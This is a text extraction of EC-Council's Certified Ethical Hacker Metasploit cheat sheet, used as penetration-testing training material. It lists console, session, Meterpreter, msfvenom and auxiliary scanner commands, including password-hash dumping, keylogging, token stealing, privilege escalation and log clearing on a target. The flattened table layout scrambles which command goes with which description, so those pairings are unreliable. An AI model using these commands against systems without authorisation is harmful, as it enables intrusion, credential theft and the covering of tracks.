Ethical Hacking and Countermeasures
Certified Ethical Hacker
Metasploit
Source:
https://www.metasploit.com
1.Metasploit General Informa�on
2. Execu�ng an Exploit / Scanner /
Module
3. Session Handling
4. Using Database
i.First Time Setup (Linux
command line)
ii. Inside msfconsole
5. Meterpreter Session
Commands
i.Base Commands
ii. Process Commands
iii. File System Commands
1.Metasploit General Information
Metasploit Command
msfconsole
version
msfupdate
makerc <FILE.rc>
msfconsole -r <FILE.rc>
2. Executing an Exploit / Scanner / Module
Metasploit Command
use <MODULE>
set payload <PAYLOAD>
show options
set <OPTION> <SETTING>
exploit or run
3. Session Handling
Metasploit Command
sessions -l
sessions -i <ID>
background or ^Z
www.eccouncil.org/ceh
Metasploit Cheat Sheet
Metasploit is an open-source project that provides the infrastructure, content, and tools to perform penetra�on tests and extensive security audi�ng. It is a tool that provides informa�on about security vulnerabili�es and aids in penetra�on
tes�ng. Metasploit framework is also used for developing and execu�ng exploits which promotes in gaining remote access to a system by exploi�ng any vulnerability present in that server. Meterpreter is a payload inside the framework.
The following table lists the various Metasploit commands and their respec�ve scanning methods.
4. Using Database i.First Time Setup (Linux command line)
Metasploit Command Description Metasploit Command Description
iv. Escalate Privileges service postgresql Start List all sessions cd Change directory
v. Networking Commands
vi. Addi�onal Commands lcd Change directory (local)
msfdb Init Init database
6. Session Management
7. Interface / Output commands
mkdir Make directory
8. Msfvenom Command Op�ons
9. Important Auxiliary Modules ii. Inside msfconsole
Syntax rmdir Remove directory
Metasploit Command Description
cat Show contents of a file
db_status Should display connected
hosts Display hosts in database edit <FILE> Edit a file in default editor (vi)
services Show ports in database upload / download Upload / download a file from target machine
vulns Exhibit all vulnerabili�es
Description iv. Escalate Privileges
Launch program
Metasploit Command Description
5. Meterpreter Session Commands
Display current version use priv Load script
i.Base commands
Pull weekly update
Metasploit Command Description getsystem Gain administra�ve-level privileges
Saves recent commands to file sysinfo Display system name and OS type
getprivs Elevate privileges
Loads resource file shutdown / reboot Shutdown system
exit / quit Exit Meterpreter session
v. Networking Commands
Description Metasploit Command Description
ii. Process Commands
Set the exploit to use ipconfig Show network interface informa�on
Metasploit Command Description
route Manage/view the system's rou�ng table
Set the payload ps Show running processes list
C Forward packets through TCP session
Show all op�ons kill <PID> Terminate process route add <Target IP/ Pivot through session by adding route in MSF
Subnet>
Set se�ng getuid Show user ID route add <Target IP/
Delete route inside MSF
Subnet> -d
Show process ID that Meterpreter is running
Execute exploit getpid sniffer Allow network sniffing interac�on commands
inside
migrate <PID> Start another process portfwd Port forwarding connec�ons
Execute given program with the privileges of portfwd -L Local host to listen
execute
the process
Description portfwd -l Local port to listen
List all sessions portfwd -p Remote port to connect
iii. File System Commands
Interact to session
Metasploit Command Description portfwd -r Remote host to connect
Detach from session
pwd / lpwd/getwd Display current working directory (local / remote)
Over 50% Of Professionals Received Promo�ons a�er C|EH
 Ethical Hacking and Countermeasures
8. MsfvenomMetasploit
Command Options Cheat Sheet
Certified Ethical Hacker

vi. Additional Commands

Metasploit Command Description Metasploit Command Description Metasploit Command Description
msf > use
shell Drop into a shell on the target machine set_desktop Configure desktop auxiliary/scanner/discovery/ar
p_sweep
hashdump Show all password hashes in Windows keyscan_dump Dump keylogger content msf > set RHOSTS <Target
IP-Range>
msf > set SHOSTS <Target IP> ARP Sweep module
idletime Display idle �me of the machine -p (Payload option) Show payload standard op�ons msf > set SMAC <MAC Address>
msf > set THREADS < Number of
screenshot Save the screenshot -l (list type) List module type concurrent threads>
msf > run
-f (format) Output format
clearev Clear the logs
msf > use
uictl [enable/disable] Enable or disable the mouse or keyboard of the -e(encoder) Define which encoder to use auxiliary/scanner/discovery/ipv
[keyboard/mouse] machine 6_neighbor
-a (Architecture or Define which pla�orm to use msf > set RHOSTS <Target
use Extension load platform IP-Range> IPV6 Neighbor module
msf > set SHOSTS <Target IP>
channel Display ac�ve channel -s (Space) Define maximum payload capacity msf > set SMAC <MAC Address>
msf > set THREADS < Number of
-b (characters) Define set of characters not to use concurrent threads>
reg Access machine registry
msf > run
-i (Number of times) Define number of �mes to use encoder msf > use
steal_token A�empts to steal impersona�on token from target
auxiliary/scanner/discovery/ud
-x (File name) Define a custom file to use as template p_ probe
espia Desktop spying by screenshots msf > set RHOSTS <Target
IP-Range> UDP Probe module
-o (output) Save payload
incognito Impersona�on commands msf > set THREADS < Number of
concurrent threads>
-h Help
msf > run
msf> search Search for any module
msf > use
msf > use exploit Specify and exploit to use auxiliary/scanner/discovery/ud
p_sweep
9. Important Auxiliary Modules msf > set RHOSTS <Target UDP Sweep module
IP-Range>
Metasploit Command Description msf > set THREADS < Number of
6. Session Management msf > use concurrent threads>
auxiliary/scanner/portscan/tcp msf > run
Metasploit Command Description msf > set RHOSTS <Target
IP/Subnet>
Port scanning module msf > use
msf > exploit -z Run exploit in background expec�ng one session msf > set PORTS 1-1000 auxiliary/scanner/scada/modbus
_findunitid Scan and detect Modbus Slaves
msf > run
msf > session -i msf > set RHOSTS <Target IP>
Interact with backgrounded session msf > run
[SessionID] msf > use
auxiliary/gather/dns_enum DNS Enumera�on module
Run exploit in background expec�ng one or more msf > use x86/opty2
msf > exploit –j msf > set DOMAIN target.tgt
sessions msf nop(opty2) > generate -h
msf > run Generates a NOP sled of a given length
Usage: generate [options]
msf > sessions -l List all backgrounded sessions length
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot FTP Server module
msf > jobs –l List all current jobs msf > run
msf > jobs –k [JobID] Kills job msf > use
auxiliary/server/socks4 Proxy Server module
meterpreter > <Ctrl+Z> / msf > run
Background current interac�ve session
meterpreter > background
msf > use
auxiliary/scanner/snmp/snmp_en
um SNMP Enumera�on module
7. Interface / Output Commands msf > set RHOSTS <Target IP>
msf > exploit
Metasploit Command Description msf > use
auxiliary/scanner/sip/enumerato
enumdesktops Display all exis�ng desktops r SIP Enumera�on module
msf > set RHOSTS <Target
getdesktop Display current desktop IP/Subnet>
msf > run
keyscan_start Start keylogger in target machine
msf > use
auxiliary/scanner/ftp/ftp_versi
keyscan_stop Stop keylogger in target machine on FTP Enumera�on module
msf > set RHOSTS <Target IP>
msf > exploit

www.eccouncil.org/ceh 97% Of Professionals Stated That Skills Acquired in C|EH Helped Safeguard Their Organiza�ons 02